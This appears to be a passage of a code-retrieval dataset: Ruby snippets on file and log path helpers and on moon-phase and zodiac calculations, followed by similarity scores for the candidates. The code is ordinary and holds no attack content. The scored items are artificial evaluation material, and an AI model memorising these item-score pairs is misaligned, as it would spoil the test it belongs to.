"def log_file_path\n @translation_session ||= \"#{Time.now.strftime(\"%Y-%m-%d-%H-%M-%S-%3N\").parameterize}_#{rand(2**8)}\"\n file_path = File.join(self.class.root_dir, \"tmp\", \"locales\", \"log\", locale.to_s, \"#{@translation_session}.yml.backup\")\n create_empty_translations_file(file_path) if !File.exists?(file_path)\n file_path\n end",
"def log_file\n @hash[\"LogFile\"]\n end",
"def log_file\n self['resque.log_file'] || ::Rails.root.join('log/resque.log').to_s\n end",
"def logger_filename\n \"#{cm_cfg_path}/logs/configmonkey.log\"\n end",
"def cron_dot_d_directory\n end",
"def file_dir\n 'files'\n end",
"def directory_path\n @directory_path || Ferver::DEFAULT_FILE_SERVER_DIR_PATH\n end",
"def pool_logger_location\n ::File.join(logger_location, \"pool.log\")\n end",
"def files_dir\n return File.absolute_path(File.join(@root_dir, 'lib', 'files'))\n end",
"def log_file\n factorio.server.log_file\n end",
"def _FILESDIR; Config._FILES; end",
"def file_log\n @file_log ||= @repo.file_log @path\n end",
"def logme(target)\n\n\t# Create Filename info to be appended to files\n\tfilenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n\n\t# Create a directory for the logs\n\tlogs = ::File.join(Msf::Config.log_directory,'scripts', 'winbf')\n\n\t# Create the log directory\n\t::FileUtils.mkdir_p(logs)\n\n\t#logfile name\n\tdest = logs + \"/\" + target + filenameinfo\n\n\tdest\nend",
"def output_file\n staged_root.join(\"output.log\")\n end",
"def file_path\n dir_name + file_name\n end",
"def log_locations\n\n alpine = {path: \"#{Dir.home}\",\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/alpine_logs\"}\n\n alpine_install = {path: \"/tmp/install.log\",\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/alpine_install_logs\"}\n\n postgres = {path: \"#{@chorus_home}/shared/db/server.log\",\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/postgres_logs\"}\n\n chorus = {path: \"#{Rails.root}/log\",\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/chorus_logs\"}\n\n tomcat = {path: max_version_tomcat_path,\n archive_path: \"#{ASSEMBLE_ZIP_DIR}/tomcat_logs\"}\n\n [chorus, alpine, alpine_install, postgres, tomcat]\n end",
"def reporter_path(filename)\n File.join(File.dirname(__FILE__), 'reporter', filename)\n end",
"def relative_directory; end",
"def save_log_dir(log_dir, results_dir)\n end",
"def set_log_file(filename)\n\t @logfile = RequestStore.LOGS_PATH + filename\n\tend",
"def set_log_file(filename)\n\t @logfile = RequestStore.LOGS_PATH + filename\n\tend",
"def log(folder,log_file_glob=nil)\n deployed_apps_folder=\"#{ENV['HOME']}/cloudfoundry/deployed_apps\"\n log_file_glob ||= \"logs/*\"\n if File.exist?(deployed_apps_folder)\n folder_nb=0\n Dir.glob(File.join(deployed_apps_folder, \"#{name()}-*\")).each do |dir|\n fname=\"#{File.basename(dir)}\"\n app_log_folder=File.join(folder,fname)\n FileUtils.mkdir_p(app_log_folder)\n if File.exist? \"#{dir}/logs\"\n FileUtils.cp(Dir.glob(File.join(\"#{dir}\", \"logs/*\")), app_log_folder)\n end\n end\n end\n end",
"def path\n \"%s/%s\" % [dirname, filename]\n end",
"def cfg_dir\n File.join(@full_path, CONFIG_DIR)\n end",
"def path\n @path ||= File.dirname @config_file\n end",
"def basedir\n File.dirname File.absolute_path options[:file]\n end",
"def dir_path\n File.expand_path(File.dirname(@path))\n end",
"def hardlink_log(log)\n FileUtils.mkdir_p(\"log\")\n FileUtils.touch(log)\n\n kochiku_base_dir = File.join(__dir__, \"../../..\")\n\n FileUtils.mkdir_p(\"#{kochiku_base_dir}/logstreamer/logs/#{@build_attempt_id}/\")\n FileUtils.ln(log, \"#{kochiku_base_dir}/logstreamer/logs/#{@build_attempt_id}/stdout.log\")\n end",
"def my_application_log_name\n \"projects/#{@project_id}/logs/my_application_log\"\n end",
"def dump_directory\n File.join(@relative_to_base, DUMP_DIRECTORY_NAME)\n end",
"def log(value=nil)\n @_log ||= File.join(dir, \"log/#{File.basename(file)}.log\") if exists?(dir, file)\n value.nil? ? @_log : @_log = value\n end",
"def config_file_path(full_directory_path)\r\n config_path = File.join(full_directory_path, @folder_config)\r\n logger.debug('config_file_path') { \"Config file path: #{config_path}\"}\r\n config_path\r\n end",
"def files_path\n File.expand_path(\"#{Config.project_root}/files\")\n end",
"def create_logs_dir\n unless File.directory? LOGS_DIR\n Dir::mkdir LOGS_DIR\n end\n end",
"def default_log_file_name\n @options['log_file_name'] || \"#{@name}.log\"\n end",
"def dump_directory\n @relative_location.end_with?('/') ? @relative_location + DUMP_DIRECTORY_NAME : @relative_location + '/' + DUMP_DIRECTORY_NAME\n end",
"def dir\n File.dirname(__FILE__)\n end",
"def output_dir\n if experiment_id.nil?\n raise Exception.new('output_dir is not yet definable')\n end\n File.join(self.output_base, \"exp_#{self.experiment_id}\")\n end",
"def find_files(location)\n @@logs = {:todo => File.join(location, \"todo.log\"), \n :metrics => File.join(location, \"metrics.log\"), \n\t:error => File.join(location, \"error.log\"),\n\t:working => File.join(location, \"working.log\")\n }\n end",
"def path\n @path ||= Pathname.new(dir) + filename\n end",
"def root_file_path; end"
] | [
"0.8008632",
"0.8008632",
"0.796843",
"0.78381485",
"0.7828726",
"0.7653239",
"0.7590869",
"0.7574525",
"0.7451976",
"0.73812646",
"0.7275158",
"0.725862",
"0.7146819",
"0.71467555",
"0.7051824",
"0.70465666",
"0.7016004",
"0.6988616",
"0.69094336",
"0.689888",
"0.689093",
"0.6859501",
"0.6858426",
"0.6821019",
"0.6817046",
"0.6794873",
"0.67308253",
"0.67272645",
"0.6725099",
"0.66792613",
"0.6667597",
"0.66675603",
"0.6660697",
"0.6644807",
"0.66309613",
"0.65696186",
"0.65536577",
"0.65274847",
"0.6475512",
"0.6441433",
"0.6391281",
"0.63873386",
"0.63792187",
"0.63727874",
"0.636663",
"0.634654",
"0.6326754",
"0.6297784",
"0.62539595",
"0.6244059",
"0.6231927",
"0.62287587",
"0.61936134",
"0.6183146",
"0.6166226",
"0.61641437",
"0.6147665",
"0.6126931",
"0.6108702",
"0.6086097",
"0.6084862",
"0.6084066",
"0.6084",
"0.6080402",
"0.6079946",
"0.60649854",
"0.6055559",
"0.60462105",
"0.60428965",
"0.60337013",
"0.6032586",
"0.601384",
"0.59980935",
"0.59853244",
"0.5983165",
"0.59806675",
"0.59794295",
"0.5975555",
"0.59600806",
"0.59587604",
"0.59587604",
"0.5953399",
"0.59507203",
"0.59453297",
"0.5926774",
"0.59256315",
"0.5923777",
"0.59188646",
"0.5911993",
"0.5906652",
"0.59031236",
"0.5896485",
"0.5891423",
"0.5863688",
"0.5862094",
"0.5853837",
"0.5852696",
"0.5844083",
"0.58279526",
"0.58270466",
"0.58269274"
] | 0.0 | -1 |
Provide an absolute path within the current Brewed's state dir. | def state(*path)
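  # Usage sketch (assumption, not from the source): state('run', 'app.pid')
  # would yield state_dir + 'run' + 'app.pid' -- assuming state_dir returns
  # a Pathname, so reduce(:+) joins path components instead of concatenating strings.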
[state_dir, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def state_path(path); end",
"def state_file_path\n File.join(RIGHT_LINK_SPEC_HELPER_TEMP_PATH, '__state.js')\n end",
"def base_path\n Dir.pwd + \"/\"\n end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def path\n '/' + path_states.map(&:name)[1..-1].join('/')\n end",
"def base_path\n @base_path ||= Dir.pwd\n end",
"def current_dir; end",
"def state_file\n return File.join(File.dirname(__FILE__), 'state.json')\n end",
"def local_yay_path\n\t\t\traise \"ENV[HOME] not found!\" unless ENV['HOME']\n\t\t\treturn \"#{ENV['HOME']}/.yay\"\n\t\tend",
"def current_path\n ::File.join(install_path, artifact_name, 'current')\n end",
"def abspath path\n if path[0] != '/'\n @homedir + '/' + path\n else\n path\n end\n end",
"def right_link_dynamic_state_dir\n return pretty_path(File.join(Dir::COMMON_APPDATA, 'RightScale', 'right_link'))\n end",
"def state(path:)\n add option: \"-state=#{path}\"\n end",
"def current_working_directory; @rye_current_working_directory; end",
"def path\n Pathname.new(\n File.expand_path(\n File.join(Gem.user_home, \".bowline\")\n )\n )\n end",
"def path\n env[PATH] ||= (env.has_key?(GIT) ? env[GIT].path : Dir.pwd)\n end",
"def state_file_path(state)\n \"#{@data_dir}/#{PathConstants::STATES_DIR}/#{state.filename}.geojson\"\n end",
"def path\n application? ? application_path : local_path\n end",
"def work_dir; end",
"def absolute_path(path)\n path = Pathname.new(path)\n return Pathname.new(@config.base_path) + path unless path.absolute?\n path\n end",
"def path\n @base\n end",
"def linked_path\n File.readlink current_directory\n end",
"def pristine_dir\n File.join pristine_dir_parent, name\n end",
"def right_link_static_state_dir\n return pretty_path(File.join(Dir::COMMON_APPDATA, 'RightScale', 'rightscale.d', 'right_link'))\n end",
"def event_state_dir(state_dir = nil)\n if ENV['WF_EVENT_STATE_DIR']\n Pathname.new(ENV['WF_EVENT_STATE_DIR'])\n elsif state_dir.nil?\n EVENT_STATE_DIR\n else\n Pathname.new(state_dir)\n end\n end",
"def my_path\n File.expand_path(File.dirname(__FILE__))\n end",
"def path\n @path ||= File.dirname @config_file\n end",
"def path\n File.join(@base, @name)\n end",
"def home_path\n File.expand_path(\"~\")\n end",
"def working_dir\n ENV['PWD'] || Dir.pwd\n end",
"def relative_working_dir\n invoke(:rev_parse, '--show-prefix')\n end",
"def base_dir(dir_name)\n File.expand_path(dir_name)\n end",
"def base_path\n @base_path ||= server_path(File.expand_path(Dir.pwd))\n end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def current\n\t\t\t\t\treturn Pathname.new(\".\")\n\t\t\t\tend",
"def relative_directory; end",
"def root\n Pathname.new(File.dirname(__dir__))\n end",
"def path()\n return ::File.join(@root, @name)\n end",
"def adjust_cb_path\n if @opts[:path]\n @opts[path] = File.join(Dir.pwd, @opts[:path])\n else\n @opts[:path] = Dir.pwd\n end\n end",
"def root; Pathname(__dir__).parent; end",
"def bits_full_local_path\n File.join(version_dir, BITS_FILENAME)\n end",
"def current_directory\n File.expand_path @current_directory\n end",
"def repo_path(path)\n File.join(File.expand_path('../../..', $0), path)\n end",
"def current_path\n File.expand_path(File.join(__FILE__,\"../\"))\nend",
"def abspath(file)\n File.absolute_path(file)\nend",
"def path\n File.expand_path File.join(basepath, version_dir, basename)\n end",
"def location\n return unless exists?\n folder_pathname.relative_path_from(root_path)\n end",
"def to_absolute_path\n File.join('', to.path(:default).to_s)\n end",
"def right_scale_static_state_dir\n return pretty_path(File.join(Dir::COMMON_APPDATA, 'RightScale', 'rightscale.d'))\n end",
"def root_path\n Pathname.new(File.expand_path(File.join(__dir__, '..', '..')))\nend",
"def local_path\n fetch_path(DevTools.gem_root)\n end",
"def root_path\n @root_path ||= `git rev-parse --show-toplevel`.chomp\n end",
"def relative_path(path)\n\t\tSass::Script::String.new(File.join(File.expand_path(Dir.pwd), path.value))\n\tend",
"def path\n File.join(@base, @name)\n end",
"def app_path(path)\n File.expand_path(path, Dir.pwd)\n end",
"def dir_path\n File.expand_path(File.dirname(@path))\n end",
"def path\n File.join(@base, @target)\n end",
"def relative_path\n @relative_path ||= absolute_path.sub(/^#{Bookshelf::remote_folder}\\/?/,'')\n end",
"def [](fpath=nil)\n if fpath.nil? || fpath.index('/') == 0\n @rye_current_working_directory = fpath\n else\n # Append to non-absolute paths\n if @rye_current_working_directory\n newpath = File.join(@rye_current_working_directory, fpath)\n @rye_current_working_directory = newpath\n else\n @rye_current_working_directory = fpath\n end\n end\n debug \"CWD: #{@rye_current_working_directory}\"\n self\n end",
"def __path__\n File.join(root, 'tmp', 'build')\n end",
"def status_file_path\n @status_file_path ||= WorkPath.path_for('global_lock')\n end",
"def path\n @backend.lib_dir + name_on_disk\n end",
"def basepath; end",
"def raw_gitdir\n\t\t\twith_dir do\n\t\t\t\treturn Pathname.new(%x/git rev-parse --git-dir/.chomp)\n\t\t\tend\n\t\tend",
"def getBAMPath()\n bamFile = Dir[\"*_marked.bam\"]\n\n if bamFile == nil || bamFile.length != 1\n return \"none\"\n else\n return Dir.pwd + \"/\" + bamFile[0].to_s\n end\n end",
"def state_filename\n File.join(@project.vartmp_dir, '.state.yaml')\n end",
"def dir_base\n File.expand_path(File.dirname(__FILE__)+\"/../..\")\n end",
"def relative_directory\n @relative_directory ||= \"_#{label}\"\n end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def base_dir=(_arg0); end",
"def path\n return ENV['ORBIT_FILE'] if ENV.include? 'ORBIT_FILE'\n\n [ENV.fetch('ORBIT_HOME'), 'config', 'orbit.json'].join(SEP)\n rescue KeyError\n raise 'env ORBIT_HOME not set'\n end",
"def file() = pathname.relative_path_from(Cnfs.config.paths.definitions)",
"def relative_path\n File.join(@repo, @bundle)\n end",
"def absolute_uri_path(path)\n \"#{root_uri}#{path}\"\n end",
"def base_relative_dir\n \t\t@dir.gsub(/^\\//,\"\")\n \tend",
"def path\n \"%s/%s\" % [dirname, filename]\n end",
"def default_path\n Gem.default_path + [@home]\n end",
"def set_git_path basedir\n @git_path = basedir\n end",
"def full_path\n container.root.join(path)\n end",
"def full_path\n container.root.join(path)\n end",
"def dir\n @working_directory\n end",
"def root\n File.dirname __dir__\n end",
"def root\n File.dirname __dir__\n end",
"def current_path\n current_folder.path\n end",
"def absolute_repository_path\n File.join(\n OpenProject::Revisions::Git::GitoliteWrapper.gitolite_global_storage_path,\n git_path\n )\n end",
"def path\n @path || File.expand_path(ENV['NEXUS_CONFIG'] || DEFAULT_FILE)\n end",
"def path\n @path ||= @project.dir.path\n end",
"def work_dir\n # The directory is not stored in a variable so it can be overridden\n # in specs.\n File.join(base_dir, \"ruby-#{RUBY_VERSION}\", \"rbs-#{RBS::VERSION}\", \"solargraph-#{Solargraph::VERSION}\")\n end"
] | [
"0.7103151",
"0.67575806",
"0.66171044",
"0.6490168",
"0.64491934",
"0.6438729",
"0.640515",
"0.6382533",
"0.63662404",
"0.6337073",
"0.6257011",
"0.62559515",
"0.6231415",
"0.6207783",
"0.61874485",
"0.6147358",
"0.6074683",
"0.6069712",
"0.60665756",
"0.6039887",
"0.6025222",
"0.60238683",
"0.60234934",
"0.6011597",
"0.60080725",
"0.5988571",
"0.5983889",
"0.5978437",
"0.5969499",
"0.5961912",
"0.5953533",
"0.59327215",
"0.5930209",
"0.5910779",
"0.5910779",
"0.5910779",
"0.5910779",
"0.5910779",
"0.5910779",
"0.5910779",
"0.59102327",
"0.59091806",
"0.5893345",
"0.5874607",
"0.58681715",
"0.5864382",
"0.5859693",
"0.58549494",
"0.5846596",
"0.58463186",
"0.5844172",
"0.5841627",
"0.5836146",
"0.5833907",
"0.5830735",
"0.5829904",
"0.5827954",
"0.58275557",
"0.5823259",
"0.5818946",
"0.58169544",
"0.5816056",
"0.5813521",
"0.58029735",
"0.57985973",
"0.57984185",
"0.57966566",
"0.5791218",
"0.57886916",
"0.577886",
"0.57770103",
"0.57697487",
"0.57661146",
"0.57543325",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.57392526",
"0.5733948",
"0.5733026",
"0.57280946",
"0.5727624",
"0.57263714",
"0.5722527",
"0.5703729",
"0.57009834",
"0.5695411",
"0.5695411",
"0.5695076",
"0.5693112",
"0.5693112",
"0.5692251",
"0.5683677",
"0.56836754",
"0.5682868",
"0.56766677"
] | 0.57346314 | 82 |
=============================================================================== Moon phases and Zodiac =============================================================================== Calculates the phase of the moon. 0 New Moon 1 Waxing Crescent 2 First Quarter 3 Waxing Gibbous 4 Full Moon 5 Waning Gibbous 6 Last Quarter 7 Waning Crescent | def moonphase(time=nil) # in UTC
time = pbGetTimeNow if !time
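  # Upper bounds (in days of the Moon's age) for each of the 8 phases:
  # odd multiples of 29.530588853/16, i.e. the midpoints between adjacent phases.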
transitions = [
1.8456618033125,
5.5369854099375,
9.2283090165625,
12.9196326231875,
16.6109562298125,
20.3022798364375,
23.9936034430625,
27.6849270496875]
yy = time.year-((12-time.mon)/10.0).floor
j = (365.25*(4712+yy)).floor + (((time.mon+9)%12)*30.6+0.5).floor + time.day+59
j -= (((yy/100.0)+49).floor*0.75).floor-38 if j>2299160
  j += (((time.hour*60)+time.min)*60+time.sec)/86400.0 # seconds since midnight, as a fraction of a day
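  # Lunations since the new moon of 2000-01-06 (JD 2451550.1); keep the
  # fractional part, then scale by 29.53 to get the Moon's age in days.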
v = (j-2451550.1)/29.530588853
v = ((v-v.floor)+(v<0 ? 1 : 0))
ag = v*29.53
for i in 0...transitions.length
return i if ag<=transitions[i]
end
return 0
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def moonphase(time) # in UTC\n transitions=[\n 1.8456618033125,\n 5.5369854099375,\n 9.2283090165625,\n 12.9196326231875,\n 16.6109562298125,\n 20.3022798364375,\n 23.9936034430625,\n 27.6849270496875]\n yy=time.year-((12-time.mon)/10.0).floor\n j=(365.25*(4712+yy)).floor + (((time.mon+9)%12)*30.6+0.5).floor + time.day+59\n j-=(((yy/100.0)+49).floor*0.75).floor-38 if j>2299160\n j+=(((time.hour*60)+time.min*60)+time.sec)/86400.0\n v=(j-2451550.1)/29.530588853\n v=((v-v.floor)+(v<0 ? 1 : 0))\n ag=v*29.53\n for i in 0...transitions.length\n return i if ag<=transitions[i]\n end\n return 0\nend",
"def _moon_phase_text(phase)\n if phase < 0.05\n 'new moon'\n elsif phase < 0.20\n 'waxing crescent moon'\n elsif phase < 0.30\n 'first quarter moon'\n elsif phase < 0.45\n 'waxing gibbous moon'\n elsif phase < 0.55\n 'full moon'\n elsif phase < 0.70\n 'waning gibbous moon'\n elsif phase < 0.80\n 'last quarter moon'\n elsif phase < 0.95\n 'waning crescent moon'\n else\n 'new moon'\n end\n end",
"def phase(dt = nil)\n dt = DateTime.now.to_time.utc.to_datetime unless dt\n pdate = dt.ajd\n\n # Calculation of the Sun's position.\n\n day = pdate - EPOCH\t# date within epoch\n n = ((360 / 365.2422) * day) % 360.0\n m = (n + ELONGE - ELONGP) % 360.0\t# convert from perigee\n # co-ordinates to epoch 1980.0\n ec = kepler(m, ECCENT)\t# solve equation of Kepler\n ec = Math.sqrt((1 + ECCENT) / (1 - ECCENT)) * Math.tan(ec / 2)\n ec = 2 * todeg(Math.atan(ec))\t# true anomaly\n lambdasun = (ec + ELONGP) % 360.0\t# Sun's geocentric ecliptic\n # longitude\n # Orbital distance factor.\n f = ((1 + ECCENT * Math.cos(torad(ec))) / (1 - ECCENT * ECCENT))\n sundist = SUNSMAX / f\t# distance to Sun in km\n sunang = f * SUNANGSIZ\t# Sun's angular size in degrees\n\n # Calculation of the Moon's position.\n\n # Moon's mean longitude.\n ml = (13.1763966 * day + MMLONG) % 360.0\n\n # Moon's mean anomaly.\n mm = (ml - 0.1114041 * day - MMLONGP) % 360.0\n\n # Moon's ascending node mean longitude.\n mn = (MLNODE - 0.0529539 * day) % 360.0\n\n # Evection.\n ev = 1.2739 * Math.sin(torad(2 * (ml - lambdasun) - mm))\n\n # Annual equation.\n ae = 0.1858 * Math.sin(torad(m))\n\n # Correction term.\n a3 = 0.37 * Math.sin(torad(m))\n\n # Corrected anomaly.\n mmp = mm + ev - ae - a3\n\n # Correction for the equation of the centre.\n mec = 6.2886 * Math.sin(torad(mmp))\n\n # Another correction term.\n a4 = 0.214 * Math.sin(torad(2 * mmp))\n\n # Corrected longitude.\n lp = ml + ev + mec - ae + a4\n\n # Variation.\n v = 0.6583 * Math.sin(torad(2 * (lp - lambdasun)))\n\n # True longitude.\n lpp = lp + v\n\n # Corrected longitude of the node.\n np = mn - 0.16 * Math.sin(torad(m))\n\n # Y inclination coordinate.\n y = Math.sin(torad(lpp - np)) * Math.cos(torad(MINC))\n\n # X inclination coordinate.\n x = Math.cos(torad(lpp - np))\n\n # Ecliptic longitude.\n lambdamoon = todeg(Math.atan2(y, x))\n lambdamoon += np\n\n # Ecliptic latitude.\n betam = todeg(Math.asin(Math.sin(torad(lpp - np)) *\n Math.sin(torad(MINC))))\n\n # Calculation of the phase of the Moon.\n\n # Age of the Moon in degrees.\n moonage = lpp - lambdasun\n\n # Phase of the Moon.\n moonphase = (1 - Math.cos(torad(moonage))) / 2\n\n # Calculate distance of moon from the centre of the Earth.\n\n moondist = (MSMAX * (1 - MECC * MECC)) /\n (1 + MECC * Math.cos(torad(mmp + mec)))\n\n # Calculate Moon's angular diameter.\n\n moondfrac = moondist / MSMAX\n moonang = MANGSIZ / moondfrac\n\n # Calculate Moon's parallax.\n\n moonpar = MPARALLAX / moondfrac\n\n pphase = moonphase\n mpfrac = (moonage % 360) / 360.0\n mage = SYNMONTH * mpfrac\n dist = moondist\n angdia = moonang\n sudist = sundist\n suangdia = sunang\n Phase.new(mpfrac, pphase, mage, dist, angdia, sudist, suangdia)\n end",
"def phases\n phs = ''\n PHASES.each do |ph|\n rating = self[\"power#{ph}_rating\".to_sym]\n phs += ph unless rating.nil? || rating.to_f == 0\n end\n phs\n end",
"def phase_one\n puts \"~~~~~PHASE 1~~~~~\".yellow\n 8.times do\n @borneo.immunity_challenge.tribal_council\n puts\n end\nend",
"def set_moon_clocks\n now = set_clocks\n \n # Has new or full moon expired?\n if now > $tnew1 || now > $tfull1\n $tnew0, $tnew1, $tfull0, $tfull1 = LunarYear.date_of_moons(now)\n end\n \n $last_new_moon.value = format_days(now - $tnew0)\n $next_new_moon.value = format_days($tnew1 - now)\n $last_full_moon.value = format_days(now - $tfull0)\n $next_full_moon.value = format_days($tfull1 - now)\nend",
"def phase_one\n\tputs \"Phase 1\"\n\t8.times do\n\t\ttribe_lost = @borneo.immunity_challenge\n\t\tputs \"#{tribe_lost.name} lost the game for immunity.\".green\n\t\tmember_voted_out = tribe_lost.tribal_council\n\t\tputs \"The tribe has spoken! #{member_voted_out.name.capitalize} it is time to go!\".green\n\t\tputs\n\tend\nend",
"def phases(wod)\n options = {\n wod: wod,\n response: api_connection.connection.get(\"phases/\"),\n directory: \"fpl_data/pulled_data/phases\",\n filename: \"phases_#{DateTime.current.strftime(\"%C%y-%m-%d\")}\"\n }\n\n CoreUtility::DataToJSON.write_or_display_data(options)\n end",
"def zodiac(month,day)\n time = [\n 3,21,4,19, # Aries\n 4,20,5,20, # Taurus\n 5,21,6,20, # Gemini\n 6,21,7,20, # Cancer\n 7,23,8,22, # Leo\n 8,23,9,22, # Virgo \n 9,23,10,22, # Libra\n 10,23,11,21, # Scorpio\n 11,22,12,21, # Sagittarius\n 12,22,1,19, # Capricorn\n 1,20,2,18, # Aquarius\n 2,19,3,20 # Pisces\n ]\n for i in 0...12\n return i if month==time[i*4] && day>=time[i*4+1]\n return i if month==time[i*4+2] && day<=time[i*4+3]\n end\n return 0\nend",
"def calculation(duration, loan, apr)\n loan * (apr / (1 - (1 + apr)**(-duration)))\nend",
"def zodiac(month,day)\n time=[\n 1,1,1,31, # The Apprentice\n 2,1,2,28, # The Companion\n 3,1,3,31, # The Beacon\n 4,1,4,30, # The Savage\n 5,1,5,31, # The Prodigy\n 6,1,6,30, # The Martyr\n 7,1,7,31, # The Maiden\n 8,1,8,31, # The Gladiator\n 9,1,9,30, # The Voyager\n 10,1,10,31, # The Thief\n 11,1,11,30, # The Glutton\n 12,1,12,31 # The Wishmaker\n ]\n for i in 0...12\n return i if month==time[i*4] && day>=time[i*4+1]\n return i if month==time[i*4+2] && day<=time[i*4+2]\n end\n return 0\nend",
"def phase_three\n puts \"Phase 3 has been started\"\n\n 7.times do\n immune = @borneo.individual_immunity_challenge\n puts \"#{immune} wins the immunity\".blue\n\t\tvoted_off_contestant = @merge_tribe.tribal_council(immune: immune)\n\t\t@jury.add_member voted_off_contestant\n\t\tputs \"#{voted_off_contestant}! is OUT!\".red\n end\nend",
"def update_phase\n new_topic.num_players_alive = num_mafia + num_town\n if phase == 1 || phase == -1\n phase = 0\n time_left = day_timelimit\n elsif phase == 0\n phase = 1\n time_left = night_timelimit\n end\n if new_topic.num_mafia >= new_topic.num_town\n gameover = true\n who_won = 0\n elsif num_mafia == 0\n gameover = true\n who_won = 1\n # else if other win condition \n end\n redirect_to root_path\n end",
"def test_Complex_InstanceMethods_phase\n\t\tassert_equal(0.9272952180016122, Complex(3,4).phase)\n\t\tassert_equal(2.214297435588181, Complex(-3,4).phase)\n\tend",
"def phase_one\n\t#Intro\n\n\t\t@borneo.tribes.each do |tribe|\n\t\tputs \"Welcome #{tribe}\".green\n\t\tend\n\nprint_header(\"For Phase 1, you will now compete in 8 challenges for immunity. Good luck!\")\n\n\t8.times do\n\t\timmunity_challenge_losing_tribe = @borneo.immunity_challenge\n\t\tputs \"#{immunity_challenge_losing_tribe}\".green + \" has lost the immunity challenge and must now vote out 1 member.\"\n\t\tmember_voted_off = immunity_challenge_losing_tribe.tribal_council\n\tend\t\nend",
"def omega() \r\n # delta_equinox()[ 3 ]\r\n Celes.faom03(@ta) \r\n end",
"def vac(hours = 1)\n vac = bac(hours) - eac(hours)\n vac.round(1)\n end",
"def phasehunt(date = nil)\n date = DateTime.now unless date\n sdate = date.ajd\n\n adate = sdate - 45\n ad1 = DateTime.jd(adate)\n\n k1 = ((ad1.year + ((ad1.month - 1) *\n (1.0 / 12.0)) - 1900) * 12.3685).floor\n\n adate = nt1 = meanphase(adate, k1)\n\n loop do\n adate += SYNMONTH\n k2 = k1 + 1\n nt2 = meanphase(adate, k2)\n break if nt1 <= sdate && nt2 > sdate\n nt1 = nt2\n k1 = k2\n end\n\n PhaseHunt.new(*[\n truephase(k1, 0.0),\n truephase(k1, 0.25),\n truephase(k1, 0.5),\n truephase(k1, 0.75),\n truephase(k2, 0.0)\n ].map do |_|\n _.new_offset(date.offset)\n end)\n end",
"def quarter_wind; end",
"def phase_one\n puts \"Phase 1 has been started\"\n\n 8.times do\n selected_tribe = @borneo.immunity_challenge\n\t\tputs \"#{selected_tribe} was the tribe selected to vote\".yellow\n\t\tvoted_off = selected_tribe.tribal_council\n\t\tputs \"#{voted_off} was voted OUT!\".red\n end\nend",
"def quarter_wind_azimuth; end",
"def tenure_mth\n self.tenure*12\n end",
"def mz_seasons\n age - System::JUNIOR_START_AGE\n end",
"def phase_one\n 8.times do\n @borneo.immunity_challenge.tribal_council()\n puts\n end\nend",
"def phase_one\n puts \"Get ready to start Part 1.\".light_grey\n puts \"Each Tribe will participate in an immunity challenge.\".light_grey\n puts \"The losing Tribe will then vote someone off the island.\".light_grey\n 8.times do \n\t#Sets variable for tribe loser of immunity challege\n\tlosing_tribe = @borneo.immunity_challenge \n\tputs \"#{losing_tribe} \".red + \"has lost the challenge and will vote someone off the island.\"\n\t#Losing tribe holds tribal council and votes off member\n\tmember_voted_off = losing_tribe.tribal_council\n\tputs \"Sadly, \" + \"#{member_voted_off} \".green + \"has been voted off the island.\"\n end\nend",
"def velocity\n @moons.each do |moon|\n moon[:position][:x] += moon[:velocity][:x]\n moon[:position][:y] += moon[:velocity][:y]\n moon[:position][:z] += moon[:velocity][:z]\n end\n end",
"def mo_Earth() \r\n# [ -0.0000000434, -0.000000576, 0.00200340, \r\n# -0.0001831, -46.836769, 84381.406 ].inject(0.0) {|p, a| p * @ta + a} * DAS2R\r\n Celes.obl06(@ajd, 0)\r\n end",
"def current_pomodoro\n total - pomodoros + 1\n end",
"def roman_numeral year\n thou = year/1000\n thou_remain = year%1000\n five_hundreds = thou_remain/500\n hundreds = (thou_remain%500)/100\n fifties = ((thou_remain%500)%100)/50\n tens = (((thou_remain%500)%100)%50)/10\n fives = ((((thou_remain%500)%100)%50)%10)/5\n ones = (((((thou_remain%500)%100)%50)%10)%5)/1\n \n \n #this is just to clear the terminal screen so you only see the result.\n100.times do puts \"\" \n end\n \n #outputs the letters times the number returned.\n puts \"M\" * thou + \"D\" * five_hundreds + \"C\" * hundreds + \"L\" * fifties + \"X\" * tens + \"V\" * fives + \"I\" * ones\nend",
"def zodiacValue(sign)\n return (sign)%12\nend",
"def phase_one\n introduction\n title \"Phase One\"\n losers = 0\n immune_members = []\n 8.times do\n losing_tribe = @borneo.tribes.shuffle.first\n puts \"The losing tribe is #{losing_tribe}\".red\n loser = losing_tribe.tribal_council()#no immune members\n puts \" The loser member is #{loser}\"\n losers += 1\n counting = 0\n @borneo.tribes.each{|tribe| counting += tribe.members.length}\n puts \" #{losers} gone!\"\n puts \" #{counting} remaining players\"\n end\nend",
"def part2(moons = INPUT, turns = 3000)\n seen = {}\n\n (0...turns).each do |turn|\n (0...4).each do |i|\n ((i + 1)...4).each do |j|\n moons[i].velocity_change += (moons[i].position.gravity(moons[j].position))\n moons[j].velocity_change += (moons[j].position.gravity(moons[i].position))\n end\n end\n\n moons.each do |moon|\n moon.adjust_state\n #print_state(moons, turn)\n end\n\n hash = moons.map(&:to_a).reduce(&:+).hash\n if seen.has_key?(hash)\n puts \"seen in #{turn} turns\"\n return\n end\n seen[hash] = 1\n #print_state(moons, turn)\n if turn % 1000 == 0\n puts \"#{turn}\"\n end\n end\n\n\n end",
"def phase_two\n puts \"Phase 2 has been started\"\n\n 3.times do\n immune = @borneo.individual_immunity_challenge\n puts \"#{immune} win the immunity\".blue\n voted_off_contestant = @merge_tribe.tribal_council({immune: immune})\n puts \"#{voted_off_contestant} is OUT!\".red\n end\nend",
